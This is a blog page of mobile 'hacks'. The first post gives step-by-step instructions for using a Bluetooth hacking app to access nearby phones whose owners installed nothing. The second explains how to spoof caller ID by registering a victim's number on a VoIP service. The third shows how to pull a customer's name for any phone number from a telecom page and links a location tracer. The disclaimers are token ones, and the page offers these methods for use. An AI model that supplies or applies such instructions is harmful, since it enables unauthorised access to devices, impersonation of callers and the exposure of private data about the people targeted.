Follow these steps to hack any Bluetooth enabled mobile phone.

  1. Download Super Bluetooth Hack 1.8 and also check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it in your mobile.

  2. There is no need to install the software in the mobile which you want to hack.

  3. Turn on the Bluetooth of your handset and open the Super Bluetooth Hack Application.

  4. Select the connect option and then Inquiry Devices to search for any of mobile that has its Bluetooth turned on nearby.

  5. Your friend’s Bluetooth must also be turned on to be found. Pairing between the devices is also necessary sometimes.

  6. Once your friend’s phone has been found, try out its functions!

Read more ...

Call Forging & Mobile Phone Locater

Joon Hospital | 12:00:00 pm | Be the first to comment!
Call Forging:

To call someone from their own number or any number.

1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number
"field as shown below.




3. Complete registration and confirm your email id and then login to your account.
click on "Direct WebCall".



4. You will arrive at page shown below. In "Enter a number" box, select your country
and also any mobile number(you can enter yours). Now, simply hit on "Call Now"
 button to call your friend with his own number.




5. That's it. Your friend will be shocked to see his own number calling him. I have
spent last two days simply playing this cool mobile hack prank.


Note: This trick will only knowledge purpose...
         Just try this trick only known person.



Trace MObile Location:

Click On Below Link To Trace Unknown Number ->

Trace Mobile Location



Get USER info of any reliance No.

http://myservices.relianceada.com/captureInstantRecharge.do

1. Enter the number of whom u want details..

2. Enter any fake email id.

3. And then click Continue.

And now u will get a screen with the number and customer name.

Note :-

Please Dont misuse or over use it :|

Read more ...
Twitter Delicious Facebook Digg Stumbleupon Favorites More

Search

Recent Post

Total Pageviews

Join us on Facebook

Blogging Tips via Email

Powered by Blogger.

Translate Your Language

Entri Populer

Twitter Page URL

Facebook Page URL

Blogroll

About